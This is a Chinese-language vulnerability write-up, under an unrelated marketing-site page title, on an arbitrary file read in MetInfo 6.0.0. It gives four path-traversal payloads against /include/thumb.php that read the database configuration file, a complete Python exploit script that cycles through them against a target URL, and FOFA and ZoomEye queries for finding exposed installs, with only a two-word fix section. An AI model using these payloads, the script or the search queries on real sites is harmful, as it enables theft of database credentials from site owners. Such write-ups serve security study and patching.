杭州營(yíng)銷(xiāo)型網(wǎng)站建設(shè)排名廣告接單平臺(tái)app
感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī)
文章目錄
- 1.1、漏洞描述
- 1.2、漏洞等級(jí)
- 1.3、影響版本
- 1.4、漏洞復(fù)現(xiàn)
- 代碼審計(jì)
- 漏洞點(diǎn)
- 1.5、深度利用
- EXP編寫(xiě)
- 1.6、漏洞挖掘
- 1.7修復(fù)建議
1.1、漏洞描述
漏洞名稱(chēng):MetInfo任意文件讀取
漏洞簡(jiǎn)介:MetInfo是一套使用PHP和MySQL開(kāi)發(fā)的內(nèi)容管理系統(tǒng),其中的/app/system/include/module/old_thumb.class.php
文件存在任意文件讀取漏洞,攻擊者可利用該漏洞讀取網(wǎng)站的敏感文件。
下載地址:歷史版本安裝文件下載 Ver_6.0.0
1.2、漏洞等級(jí)
高危
1.3、影響版本
影響版本:MetInfo 6.0.0
1.4、漏洞復(fù)現(xiàn)
代碼審計(jì)
defined('IN_MET') or exit('No permission');load::sys_class('web');class old_thumb extends web{public function doshow(){global $_M;$dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;}
$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);
dir變量接受來(lái)自$_GET[‘dir’]傳遞進(jìn)來(lái)的值,用了str_replace函數(shù)做替換,將../
,./
替換成空值
readfile($dir);
漏洞點(diǎn)
/include/thumb.php
使用bp進(jìn)行抓包
測(cè)試一:
/include/thumb.php?dir=..././http/..././config/config_db.php
測(cè)試二:
/include/thumb.php?dir=.....///http/.....///config/config_db.php
測(cè)試三:
/include/thumb.php?dir=http/.....///.....///config/config_db.php
測(cè)試四:
/include/thumb.php?dir=http\..\..\config\config_db.php# 此POC 僅適用于Windows 系統(tǒng),Linux 下無(wú)效
# 只有windows以右斜杠作為文件路徑分隔符
1.5、深度利用
EXP編寫(xiě)
import requests
import sysbanner = """
MetInfo 6.0.0___________.__.__ __________ .___\_ _____/|__| | ____ \______ \ ____ _____ __| _/| __) | | | _/ __ \ | _// __ \\__ \ / __ | | \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ | \___ / |__|____/\___ > |____|_ /\___ >____ /\____ | \/ \/ \/ \/ \/ \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}dir_list = ["..././http/..././config/config_db.php",".....///http/.....///config/config_db.php","http/.....///.....///config/config_db.php","http\..\..\config\config_db.php"
]def attack(host):vul = "/include/thumb.php"url = host + vulres = requests.get(url = url, headers = headers)if res.status_code != 200:print(f"[INFO] {vul} is Not Exists!")exit()print(f"[INFO] {vul} is Exists!")for param in dir_list:params = {"dir": param }res = requests.get(url = url, params = params, headers = headers)print(f"[INFO] Test URL: {res.url}")if "<?php" in res.text:print("[RESULT] The target is vulnreable!")print(f"[RESULT]\n{res.text}")breakif len(sys.argv) < 2:print(banner)exit()host = sys.argv[1]attack(host = host)
1.6、漏洞挖掘
FOFA
app="metinfo"
ZoomEye
app:"MetInfo"
app:"MetInfo"+os:"Windows"
1.7修復(fù)建議
- 升級(jí)
- 打補(bǔ)丁